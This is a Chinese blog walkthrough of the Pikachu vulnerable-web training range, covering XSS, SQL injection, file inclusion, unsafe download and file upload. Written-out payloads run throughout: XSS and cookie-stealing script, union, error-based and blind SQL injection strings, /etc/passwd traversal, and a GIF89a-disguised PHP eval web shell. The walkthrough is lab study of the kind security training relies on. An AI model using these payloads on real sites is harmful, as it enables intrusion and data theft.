pikachu综合靶场漏洞讲解

于 2024-08-20 11:26:50 发布
阅读量589 收藏 13
点赞数 12
分类专栏: 网络安全 渗透测试 文章标签: web安全 网络安全 sql xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YhMjQx/article/details/141353726
版权

目录

pikachu综合靶场漏洞讲解

XSS

反射性xss(get)

反射性xss(post)

存储型xss

DOM型xss

DOM型xss-x

xss盲打

xss之过滤

xss之htmlspecialchars

xss之href输出

xss之js输出

SQL-Injection

数字型注入(post)

字符型注入(get)

搜索型注入

xx型注入

insert/update注入

delete注入

http头注入

boolian盲注

时间盲注

宽字节注入

File Inclusion

local

remote

Unsafe Filedownload

Unsafe Fileupload

client check

MIME type

getimagesize

XSS

反射性xss(get)

F12修改输入长度限制,直接 <script>alert(/xss/)</sxript>

反射性xss(post)

先登陆进去之后 在输入payload <script>alert(/xss/)</sxript>

image-20240807185929906

存储型xss

尝试输入 <''>' aaaa,然后查看页面源代码发现原封不动地出现在了页面当中

直接输入payload <script>alert(/xss/)</sxript>

DOM型xss

尝试输入payload <script>alert(/xss/)</script> 给出了一个超链接 查看源代码,发现超链接的内容就是我们输入的内容,于是直接构造 javascript:alert(/xss/)

image-20240807195004053

DOM型xss-x

与上面同样的方法,尝试输入 <script>alert(/xss/)</script> 查看页面源代码,发现输入内容依旧是到了超链接中

image-20240807195217688

依旧是输入payload javascript:alert(/xss/)

image-20240807195338965

xss盲打

这道题存粹是盲打

输入的内容都不知道在哪里,看一下提示

image-20240807214034539

难道这个题主要是用来攻击管理员的,我们可以将beefxss或者bluelotas生成的xss payload 放入这个输入框中,等待管理员访问就可以了

image-20240807221039808

image-20240807221012493

作为后台管理员登录尝试

image-20240807221146371

进入beef-xss管理界面,直接拿下

image-20240807221310032

xss之过滤

尝试输入 <script'>" 发现最后输出的内容是 '>" 说明 <script 被过滤了

试试大小写绕过 <ScRiPt> ,查看源代码还是存在的

image-20240808105152878

尝试payload <ScRiPt>alert(/xss/)</ScRipt> 成功

image-20240808105245099

xss之htmlspecialchars

尝试输入正常内容发现被替换到超链接当中,再尝试特殊字符输入 <'>(")script

image-20240808105659658

除了圆括号和script没有被转换,其他特殊字符基本都被转换为实体字符了,那么尝试payload javascript:alert(/xss/) 点击超链接,成功

image-20240808105814808

xss之href输出

尝试输入特殊字符查看过滤情况和输出位置 <'script'>(") 发现依旧是特殊字符实体转换

image-20240808110116053

尝试 payload javascript:alert(/xss/) ,成功

image-20240808110152706

xss之js输出

输入 <'script'>(") ,我们查看源代码可以发现,内容被动态生成到js代码中去了

image-20240808110357387

我们尝试按照他的代码来看看 闭合单引号 payload 如下 tmac'; alert(document.cookie); // 成功

image-20240808112442842

SQL-Injection

数字型注入(post)

 id=1 and 1=1
 id=1 and 1=2
 id=1 union select 1,2  //匹配columns_num
 id=1 union select 1,database()

字符型注入(get)

 vince
 vince'
 vince' and 1='1
 vince' and 1='2
 vince' #
 vince' union select 1,database() #

搜索型注入

 vince
 vince'
 vince' #
 vince' union select 1,2#
 vince' union select 1,database(),3#

xx型注入

 vince
 vince'       报错
 vince' #     报错
 vince' --+   报错
 查看报错信息,发现出现了圆括号,尝试闭合
 vince') #    成功
 vince') union select 1,2#
 vince') union select 1,database()#

insert/update注入

既然是insert/update注入,那么就是更新类注入,一般情况下会优先考虑报错注入

先尝试登录一下,登录成功之后是这样的,warning是因为PHP版本不同,我用的是PHP7.3的版本,比较新。在php7中,MYSQL_ASSOC不再是一个常量,将 MYSQL_ASSOC改为MYSQLI_ASSOC,意思是mysqli的方式提取数组,而不再是mysql 。(原因:mysql_fetch_arrayhan函数转为mysqli_fetch_array,参数没有修改)

image-20240808134712474

 ​

image-20240808135135673

我们尝试注册一下

 username:baba'
 password:123456
 以上情况果不其然报错了
 ​
 username:baba')
 password:123456
 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '',md5('123456'),'','','','')' at line 1
 username:baba')#
 password:123456
 Column count doesn't match value count at row 1
 ​
 ​
 这种情况我们需要在password处做文章,且要求单引号圆括号闭合
 username:baba')#
 password:') and updatexml(1,concat(0x7e,database(),0x7e),1) and ('
 XPATH syntax error: '~pikachu~'
 ​
 成了

delete注入

尝试发表正常的留言,鼠标放在删除的超链接上,可以发现后面有一个id参数,我们可以尝试注入一下

image-20240808141627796

不过这里我们就需要抓包了,开启抓包,点击删除

image-20240808141753852

我们发现这是数字型注入,简单,直接上payload

留言一次删一次,不然一直都会报错,或者因为是数字型注入,直接上payload即可

 updatexml(1,concat(0x7e,database(),0x7e),1)

http头注入

登录访问抓包 一共有两个包,两个都尝试一下 分开尝试,因为害怕其中一个请求出问题会导致另一个请求也出问题。测试发现第二个请求才是回显到页面上内容的请求,第一次直接使用 updatexml(1,concat(0x7e,database(),0x7e),1) 发现这段payload直接输出到页面上,说明这是字符型的注入(当然,一般情况下http头注,基本上都是字符型的,哪来的数字型),那么接下来就闭合单引号,测试发现 # 和 --+ 都不能作为注释符,那就使用 or 逻辑符号 ' or updatexml(1,concat(0x7e,database(),0x7e),1) or ' 成功闭合

image-20240808191121158

而且我发现,既然页面会输出我的请求头信息,那是否会存在反射性xss漏洞呢,尝试了一下payload使用 <script>alert(/xss/)</script> 也是成功的

image-20240808192116226

boolian盲注

尝试在输入框中输入信息,很多次,无果,于是就直接抓包尝试,闭合单引号过程中发现了这个问题,闭合成功了

image-20240808193349562

那再尝试能不能注释掉单引号,确实可以

image-20240808193534353

尝试payload vince'+and+length(database())%3d7%23 也就是 vince' and length(database())=7#

image-20240808193942223

image-20240808194033042

把数据库长度换个数字就不行了,由此成功实现布尔盲注

时间盲注

估计和上面差不多,尝试更换条件为

 vince'+and+if(length(database())<10,sleep(5),1)+%23
 即 
 vince' and if(length(database())<10,sleep(5),1) # 
 确定好数据库名称长度之后,就可以利用substr来爆破表名 比如 
 vince' and if(substr(database(),1,1)="p",sleep(5),1) #
 同样的道理可以用在用户名 
 vince' and if(substr(user(),1,1)="p",sleep(5),1) # 
 等 
 vince' and if(substr((select group_concat(column_name) from information_schema.columns where table_name="pikachu"),1,1)="p",sleep(5),1) #
select group_concat(table_name) from information_schema.tables where table_schema="pikachu"

select group_concat(column_name) from information_schema.columns where table_name="users"

select 1,(select group_concat(concat(userid,"==",username,"==",password)) from users

宽字节注入

既然知道了是宽字节注入,那么我们就应该知道宽字节注入的原理,我们常用的是 %bf 来闭合单引号绕过

bp抓包 payload baba%bf'+union+select+1,database()%23

image-20240808223807736

image-20240808223950746

File Inclusion

local

直接使用 /etc/passwd 报错

image-20240808224222884

说明,后台代码应该添加了文件目录前缀,于是我们可以使用 ../ 来进行绕过

image-20240808224126742

甚至还可以包含Web日志

  • 访问该应用系统并用bp抓包,注意分清楚这是什么中间件搭建的服务器,我们这里是 xampp web日志存在于 /opt/lammp/logs/access_log 文件中 。先随便访问一个网页,bp抓包,修改参数内容如下

    image-20240808225240574

  • 然后访问

    image-20240808225433045

    往下滑

    image-20240808225522959

remote

由于本地防火墙的原因,虚拟机无法直接包含物理机的文件,所以在此就稍微看以下错误,拒绝连接

image-20240808231358125

Unsafe Filedownload

这道题目简单,点击下载之后浏览器URL地址没有任何变化,于是 F12 定位到超链接位置,将超链接更换到URL地址处,输入自己想要下载的文件即可

image-20240809092155002

Unsafe Fileupload

client check

看到客户端校验就想到前端 js 校验,直接禁用 js 记得刷新,然后上传文件即可

image-20240809101634303

image-20240809101842731

MIME type

检查文件类型,bp抓包,修改content-type即可

image-20240809102120204

结果和上面是一样的

getimagesize

该函数会检查上传的文件是否为一张图片,并获取图片的长 宽等参数。该怎么绕过getimagesize这个函数呢

GIF89a
<?php @eval($_POST["a"]);?>

使用GIF89a绕过 但是会告诉我们还判断了文件后缀名,尝试禁用 js 这里不是弹窗 禁用 js 好像不太行

image-20240809105932148

那既然如此,我们就上传一个图片马, 然后bp抓包,修改文件后缀试试,都不行

于是我只能利用文件上传加文件包含了,也就是在这边上传图片马,然后利用文件包含

image-20240809111432136

YhMjQx
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场全关卡讲解
2302_76688540的博客
05-08 1749
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响应,而如果校验的规则过于简单则容易出现越权漏洞
pikachu靶场-->CSRF漏洞详解
unlash的博客
10-13 435
pikachu靶场CSRF漏洞详解,通关教程,漏洞介绍,防御措施,漏洞检测,漏洞危害
Pikachu靶场XSS漏洞详解
热门推荐
m0_46467017的博客
05-13 1万+
Pikachu靶场XSS漏洞详解前言XSS漏洞简述第1关 反射型xss(get)第2关 反射性xss(post)第3关 存储型xss第4关 DOM型xss第5关 DOM型xss-x第6关 xss盲打第7关 xss之过滤第8关 xss之htmlspecialchars第9关 xss之href输出第10关 xss之js输出 前言 本篇文章用于巩固对自己xss漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu XSS Cross-Site Scripting皮卡丘漏洞平台通关系列 链接: P
Pikachu靶场01-文件上传漏洞详解
AkangBoy的博客
12-02 2185
本文主要介绍离线靶场Pikachu中的文件上传漏洞的原理和绕过姿势
pikachu靶场之XXE漏洞详解
lxz021202的博客
03-02 1464
然后观察请求行、Accept、Content-Type,这里可以从Accept中发现能够接收的文档类型包括xml。上图说明目标主机访问了代码中的网址,那就说明目标主机能够解析xml代码,所以可能存在xxe漏洞。然后在Kali中编辑一个文件xxe.dtd(需要在存在这个文件的目录下开启HTTP服务)这段代码是用来读取本机中的123.txt文件,马赛克处是Kali的IP。这是个域名解析网站,在这里用来检验目标主机是否能够解析xml的代码。这个payload会调用Kali中的xxe.dtd文件。
Pikachu靶场——CSRF漏洞
知世郎
08-10 506
CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。也被称为 one-click attack 或者 session riding。
Pikachu--XXE漏洞
weixin_53736204的博客
07-25 1038
XML文档结构由XML声明,DTD(文档类型定义),文档元素三部分构成!--定义此文档是 note 类型的文档-->!ELEMENT--定义note元素有四个元素-->--定义to元素为"#PCDATA”类型-->!ELEMENT!ELEMENT--定义from元素为"#PCDATA”类型-->!ELEMENT--定义head元素为"#PCDATA"类型-->!ELEMENT--定义body元素为"#PCDATA"类型--></</</</</》》》XML特性《《《
pikachu靶场通关技巧详解
henghengzhao_的博客
10-13 7167
pikachu靶场全部漏洞详解,不懂可以留言,作者会及时回复
Pikachu靶场-xss详解
qq_53083285的博客
10-30 7551
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类型及测试流程反射型XSS(post&get)存储型XSSDom型XSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss的过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS;
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 541
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 992
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 837
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 232
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
pikachu靶场逻辑漏洞
09-16
Pikachu靶场中存在逻辑越权漏洞。逻辑越权漏洞是指攻击者通过绕过应用程序的权限控制机制,直接访问或执行未授权的操作。具体来说,在Pikachu靶场中,攻击者可以通过使用超级boss账号"admin"或"pikachu",以及相应的密码"123456"或"000000",绕过权限限制,获取到其他用户的权限或执行未授权的操作。 参考资料: - [pikachu Unsafe Fileupload 不安全的文件上传(pikachu Over permission 越权(皮卡丘漏洞平台通关系列))](链接:https://xz.aliyun.com/t/7171) - [逻辑越权漏洞 逻辑越权漏洞简述 漏洞描述](链接:https://blog.csdn.net/pzjtian/article/details/89206239) - [Pikachu靶场之越权漏洞详解](链接:https://www.freebuf.com/articles/web/210978.html)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值